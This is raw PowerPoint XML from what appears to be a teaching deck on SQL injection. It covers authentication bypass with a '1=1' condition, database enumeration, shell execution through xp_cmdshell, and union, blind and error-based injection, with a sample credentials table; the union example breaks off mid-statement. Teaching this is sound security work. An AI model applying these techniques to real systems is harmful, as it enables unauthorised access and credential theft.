        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23483614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04E68D6-20FC-4F29-A7BD-D531A2EC0D46}"/>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1507A03F-D9FB-42EF-A79B-F1B0B64B947D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId2"/>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CF7901F4-FA83-4727-8085-D5583880C746}"/>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72A3C2A4-2D45-479A-BDFF-2E959455DC4E}"/>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DB8F2898-85D9-4AAF-A6D9-3B62A78B7A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0B17BE4-F439-4A57-BF90-1E9E27C8808C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL Injection Part 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D5B9C01-0EEB-4071-B61F-F6CA9A97F2FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295400"/>
            <a:ext cx="8153192" cy="5174326"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authentication Bypass</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If statement evaluates to true, may not need password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: 1=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Database Enumeration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can select data from tables or other databases</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Credential exposure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Shell Execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MSSQL: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (and others)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MySQL/MariaDB: write a PHP procedure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2520940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6C6DBB3-B07C-4938-ADA4-4A0356F81795}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7325139" y="754034"/>
            <a:ext cx="4746642" cy="5423296"/>
            <a:chOff x="6848667" y="541176"/>
            <a:chExt cx="5271798" cy="5701004"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="7" name="Picture 6" descr="A picture containing laser, light, scene, dark&#10;&#10;Description automatically generated">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CFEA533-AE3B-4741-A2BA-E10BA47F7017}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId2"/>
            <a:srcRect l="35413"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6913984" y="541176"/>
              <a:ext cx="5122232" cy="5701004"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Rectangle 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11C7EEBB-6F84-4CFC-B123-D7F697EC2F0D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6848667" y="541176"/>
              <a:ext cx="5206481" cy="5701004"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="69000">
                  <a:srgbClr val="0D2541"/>
                </a:gs>
                <a:gs pos="0">
                  <a:schemeClr val="bg1">
                    <a:alpha val="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6E4AFF37-3FBE-4CD6-A2BB-D5B3FACC0BC7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6913984" y="541176"/>
              <a:ext cx="5206481" cy="5701004"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="84061">
                  <a:srgbClr val="0D2541">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="70798">
                  <a:srgbClr val="0D2541">
                    <a:alpha val="30000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="61000">
                  <a:srgbClr val="0D2541">
                    <a:alpha val="46000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="95000">
                  <a:schemeClr val="bg1"/>
                </a:gs>
                <a:gs pos="24000">
                  <a:srgbClr val="0D2541">
                    <a:alpha val="78000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="43000">
                  <a:srgbClr val="0D2541">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="10000">
                  <a:srgbClr val="0D2541">
                    <a:alpha val="47000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="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7A227B46-E91C-47C5-91A9-51C1FFA1DF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948AFF24-683B-4F6E-9C33-56BC2AB2281E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL Injection Part 3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6F83B55-0B87-46BD-BF50-5D10AB02B442}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295400"/>
            <a:ext cx="7449501" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Multiple types of injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most common: union, blind, error-based</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>Union</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: retrieve data alongside the valid request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>Blind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Boolean or time-based responses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>Error-Based</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: May be able to get data out through error statements if exposed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26333904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184181-BDA0-4A38-8CF4-84C0574541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439F9CD-327D-4D38-A033-703CF2BBBF68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Basic Union Statement</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Table 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AFFA8D5-9C96-43D2-ACC0-E2CA240D1D3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="299440" y="1459416"/>
          <a:ext cx="4422728" cy="845820"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{69012ECD-51FC-41F1-AA8D-1B2483CD663E}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1215035">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2651765493"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1215035">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3420692702"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1215035">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="589072782"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="777623">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3381604601"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="190500">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="b"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="1" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Table:</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>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a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>first</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="00B05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rgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>last</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FFFF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rgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>id</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF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036"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="190500">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="b"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>users</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a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>john</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="00B05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dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>mcclane</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FFFF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dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>1</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF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5758316"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="190500">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="b"/>
                      <a:endParaRPr lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>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err="1">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>hanz</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="00B05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800" b="1" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>gruber</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FFFF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rgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" b="1"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93024810"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7" name="Table 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF247163-464F-44E2-A87B-11AAE32A1825}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5118408" y="1459416"/>
          <a:ext cx="6749217" cy="845820"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{69012ECD-51FC-41F1-AA8D-1B2483CD663E}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1265478">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1260618570"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1265478">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3255412918"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1675284">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3597529199"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="457200">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4063488568"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1046480">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4151562691"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1039297">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3454492392"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="190500">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="b"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="1" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Table:</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>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a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>user</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>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chemeClr val="tx2"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>password</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>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chemeClr val="tx2"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>id</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>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chemeClr val="tx2"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>first</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>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solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>last</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>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5054889"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="190500">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="b"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>credentials</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err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>jmcclane</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>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dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>YippeeKayYay</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>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chemeClr val="tx2"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>1</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>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dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>john</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>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dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>mcclane</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>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24007872"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="190500">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="b"/>
                      <a:endParaRPr lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>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b="1" u="none" strike="noStrike" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>hgruber</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>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800" b="1" u="none" strike="noStrike" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>notaterrorist</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="7620" marR="7620" marT="7620" marB="0" anchor="b"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" fontAlgn="b"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="1" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="7620" marR="7620" marT="7620" marB="0" anchor="b"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" fontAlgn="b"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="1" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>hanz</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>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2"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>gruber</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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9762237"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3837EDC-B93F-438D-ABEF-8D095412C30F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="123322" y="2563362"/>
            <a:ext cx="11032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Statement: </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SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="sng" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:effectLst/>
